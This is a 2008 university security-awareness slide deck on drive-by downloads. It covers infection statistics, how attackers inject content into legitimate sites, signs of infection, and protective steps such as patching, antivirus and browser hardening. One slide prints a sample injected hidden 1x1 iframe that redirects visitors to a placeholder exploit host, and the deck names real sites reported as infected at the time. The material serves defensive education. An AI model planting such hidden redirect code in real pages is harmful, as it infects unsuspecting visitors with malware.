Protecting Yourself On-line Carol Taylor Assistant Professor Computer Science EWU QSI Conference Skye Hagen Asst Director Office of Information Technology, EWU August 26-27, 2008 1 Overview Security User Responses Motivation Drive-by Downloads Defining the problem Examples Recommendations QSI Conference August 26-27, 2008 2 User Survey How many people use Anti-virus? Do you keep it up to date? How many people use Spyware programs? Do you use firewall programs? Windows Firewall, Comodo Firewall Pro (others) Do you back up the data on your computer? QSI Conference August 26-27, 2008 3 Motivation Why should you be concerned with Web security? I only shop at legitimate sites, I don’t ever visit sites with questionable content Is that enough to keep you safe? That’s not enough to keep you safe in the current Web environment Surfing regular e-commerce sites can infect your computer QSI Conference August 26-27, 2008 4 Motivation Statistics show that Web security is getting worse ScanSafe reported a 220 % increase in the amount of Web-based malware over the period between 2007-2008 The volume of backdoor and passwordstealing malware blocked by the firm increased by an order of magnitude 855 % between May 2007 to May 2008 QSI Conference August 26-27, 2008 5 Motivation A website infected with malware is detected every five seconds (2008) That represents a dramatic increase over the last 12 months Websites poisoned with malware capable of infecting visitors' machines are being discovered at a rate of 16,173 per day Three times faster than in 2007 http://www.reuters.com/article/pressRelease/idUS120735+23-Jul2008+BW20080723 QSI Conference August 26-27, 2008 6 More Motivation Antivirus firm Sophos found that more than 90 % of web pages capable of spreading Trojan horses and spyware are legitimate websites Recent infected websites include those of ITV, Sony PlayStation, golf page on the BBC site, and a variety of other commercial Blogspot.com, the blog publishing system owned by Google, was found to be hosting two per cent of the world's web-based malware in June 2008 QSI Conference August 26-27, 2008 7 Motivation Summary The threats are real!!!! The Internet is an amazing collection of Entertainment, knowledge, social opportunities and goods but … The Internet is also a mirror for society Crime, fraud, personal safety and privacy threats are real, just like in the real world The main difference is that the threats are hidden, risk is not obvious You must protect yourself from these real dangers QSI Conference August 26-27, 2008 8 Drive-by Downloads This attack takes advantage of known vulnerabilities in browsers and operating systems In a drive by an unsuspecting user (you) downloads and installs software without ever knowing it while they surf the web Can happen when you agree to install browser plugins, run a Java Applet, or Java Script or launch Active-X applications However it can also happen without you doing anything There are Web pages modified with code that redirects visitors to another site infected with malware that can break into your PC, without you even realizing it QSI Conference August 26-27, 2008 9 Definitions Active X Control or Active X: A program, developed which can be embedded in a web page or downloaded from a web page and executed from within the browser itself. A browser must support ActiveX controls for this to work Javascript: A scripting language, based on both Java and C++, used to create code that is commonly embedded into HTML on web pages for enhanced functionality For instance validation of user typed input on a form 10 Definitions Java Applet: An applet is a small program, usually embedded in a web page, which can perform a number of duties such as playing audio or video clips and querying a database. These programs are normally written in Java QSI Conference August 26-27, 2008 11 Drive-by Downloads Unsuspecting users are victimized by simply doing what they do hundreds of times each day Visiting a Web page Then, while you browse content normally, A computer virus or Trojan horse program is silently installed QSI Conference August 26-27, 2008 12 Drive-by Downloads Drive-by downloads are not new, but criminals have seized on the tactic lately because their success rate with traditional e-mail viruses has tapered off Avoiding e-mail viruses is not always easy, but more likely as long as you follow clear rules like "don't click on any attachments" But drive-by downloads are much more sinister No user interaction is generally required beyond opening an infected site in a Web browser QSI Conference August 26-27, 2008 13 Scope of the Problem http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html Google crawled billions of Web pages and found … More than 3,000,000 unique URLs on over 180,000 web sites automatically installing malware Graph is % of daily Google queries that contain at least one harmful site in 2007 QSI Conference August 26-27, 2008 14 Drive-by Downloads How Web Sites get infected One injection technique, gain access to the Web Server that hosts the site Attacker injects new content to the compromised website Typically, injected content is a link that redirects visitors of these websites to a URL that hosts a script crafted to exploit the browser To avoid visual detection by website owners, attackers use invisible HTML components e.g., zero pixel IFRAMEs hide injected content QSI Conference August 26-27, 2008 15 Example of Web Server Compromise – “Italian Job” 2007- Online criminals launched a Web attack that compromised thousands of legitimate Web sites Infected Web sites contain HTML "iFrame" code that redirects victim's browser to server that attempts to infect victim's computer Internet Explorer, Firefox, and Opera are vulnerable Keyloggers and Trojan downloader program found on compromised PCs so attackers can monitor victim's activity and run other unauthorized programs on the computer “They can turn your computer into anything they want” http://www.networkworld.com/news/2007/061907-italian-job-web-attack.html 16 Example of Web Server Compromise – iFrame Example Following code is injected into web pages Size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code: <iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html> Above server, remote.example.com index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer Executable was recognized by about half of anti-virus tools as a spyware trojan 17 Steps for Drive-by Download Browser gets redirected by hidden link, remote.example.com Downloads and executes hidden malware, from index.html QSI Conference August 26-27, 2008 http://research.google.com/archive/provos-2008a.pdf 18 Drive-by Downloads How Web Sites get infected Another common injection technique Use websites that allow users to contribute their own content Postings to forums or blogs User contributed content may be restricted to text but often can also contain HTML such as links to images or other external content Adversary can simply inject the exploit URL without the need to compromise the web server QSI Conference August 26-27, 2008 19 Example of User Contributed Content Compromise - Blog WordPress is the most popular software for blogs Should use the the current installation of WordPress (WP) Version 2.5.1 There is an increasing number of blogs, all with version WP 2.3 and earlier Getting “hit” by the well known iFrame exploit that infects website visitors with a trojan download Advice from Marc Liron – Sitebuilder pro QSI Conference August 26-27, 2008 20 Example of User Contributed Content Compromise - Blog Author, Marc Liron had trouble loading a site from well known Internet Marketer, Stu McLaren So, he attempted to access Stu’s blog (June 2008) http://myideaguy.com/blog/ (DO NOT GO THERE) A few moments after visiting the section: http://myideaguy.com/blog/category/products/ (DO NOT GO THERE) His installation of Kaspersky Security Suite ALERTED that a TROJAN infection trying to infect his computer!!! The culprit was: Trojan-Downloader.HTML.Agent.is http://www.marcliron.co.uk/sitebuilditreview/ stu-mclarens-blog-gets-infected-by-hackers 21 Google Flags Malicious Sites Site has repeated problems http://www.wowstatus.net/ World of Warcraft site Google flagged it as hosting malicious content http://www.google.com/interstitial?url=http://www.wowstatus.net/ One way sites are being flagged to alert you However not all sites are flagged …. QSI Conference August 26-27, 2008 22 Signs You are Infected Spyware alerts after you have visited a site See a program pop up that you never loaded Asks you to do something (don’t do it!) Web browser’s home page changed Browser has new book marks Pop-up window advertisements Unusual files on your computer QSI Conference August 26-27, 2008 23 How to Protect Yourself QSI Conference August 26-27, 2008 24 User Behavior If you think you have been infected, Don’t say yes to anything Close pop-up windows that appear You get an offer to help you clean up your computer, remove spyware As one researcher put it “I rob you, then I run back and offer to help identify the culprit that did it” Not too helpful … QSI Conference August 26-27, 2008 25 Example Problem Pop-UP If you click "Yes," spyware is installed. Note the presence of a security certificate is no guarantee that something is not spyware. QSI Conference August 26-27, 2008 26 Protection from Drive-by Downloads Keep Operating system patched and up to date Turn on automatic updates for OS Windows XP Settings, Choose Control Panel then System Open the System Tool Turn on Automatic Updates QSI Conference August 26-27, 2008 27 Protection from Drive-by Downloads Use the latest browser, Firefox, IE Explorer, Opera Keep browsers patched and up to date Turn on automated updates for Browser Firefox, current version, 2.0.0.16 and automatic update is enabled by default But to see the option type, Go to tools > Options > Advanced > Update IE Explorer is up to version 7 Was an automatic update by MS Use this latest version!!! Has phishing protection built in 28 Protection from Drive-by Downloads Install several programs for removing spyware and viruses – These are free!!! Adaware SE Spybot Search and Destroy http://lavasoft.com/single/trialpay.php http://www.safer-networking.org/en/index.html AVG – virus program http://free.avg.com/ Avira AntiVir – Another Virus program http://www.free-av.com/ http://www.viewpoints.com/Avira-AntiVir-Personal-EditionClassic-review-5ed20 29 Protection from Drive-by Downloads Harden your Web browser Medium security is not good enough Set it to higher Disable active scripting or have it prompt you If have problems, add sites to an accepted list Firefox IE7 Open the “Tools” menu Select “Options” Click “Content”. Click the check box to the left of “Disable JavaScript” so that a tick appears. Open the “Tools” menu. Select “Internet Options…”, Click the “Security” tab. Click the “Internet” symbol (a globe) Click the “Custom Level…” In the Settings list, scroll down to “Scripting”. Under Active Scripting, 30 August 26-27, 2008 click “Disable” QSI Conference Protection from Drive-by Downloads Another way to protect yourself is by virtualizing your Web session Using ZoneAlarm’s ForceField The virtualization technology in ForceField forms a "bubble of security" around the Web browser so that all unknown or unwanted changes from drive-by downloads, are made to a virtualized file system Disappear completely once the user is finished surfing ForceField's virtualization claims to offer additional security by protecting the browser session from any malware that might be on the PC 31 http://www.zonealarm.com/store/content/catalog/products/zonealarm_forcefield.jsp More protection using a free browser toolbar Haute Secure A company started by Microsoft employees Produce a free toolbar supposed to protect you from bad web sites Seems to be a good product Can try it and report back http://hautesecure.com/solutions.aspx QSI Conference August 26-27, 2008 32 Summary Internet is a scary place Great place to hang out but … Dangerous too Ignore Security? Sure …. Result is your computer can be used for spam or to commit crime Your sensitive data can be compromised You will be a victim of theft Your computer may be unusable Pay some attention, get or buy security software … Security is a process!!! 33 Resources EWU Security Awareness Site http://www.ewu.edu/securityawareness SANS Reading Room – lots of technical papers http://www.sans.org/reading_room/ Drive-by Download Video http://video.google.com/videoplay?docid=3351512772400238297&ei=IPK0SLreOZTcqgOWjum9DA&q=Driv e+by+download+%2B+watchgaurd&hl=en StopBadware.org – search for bad websites http://www.stopbadware.org/home/clearinghouse Re-installing Windows XP – last resort http://www.pcworld.com/article/129977/ how_to_reinstall_windows_xp.html 34 This presentation can be found at http://www.ewu.edu/securityawareness My email: ctaylor4214@comcast.net Questions 35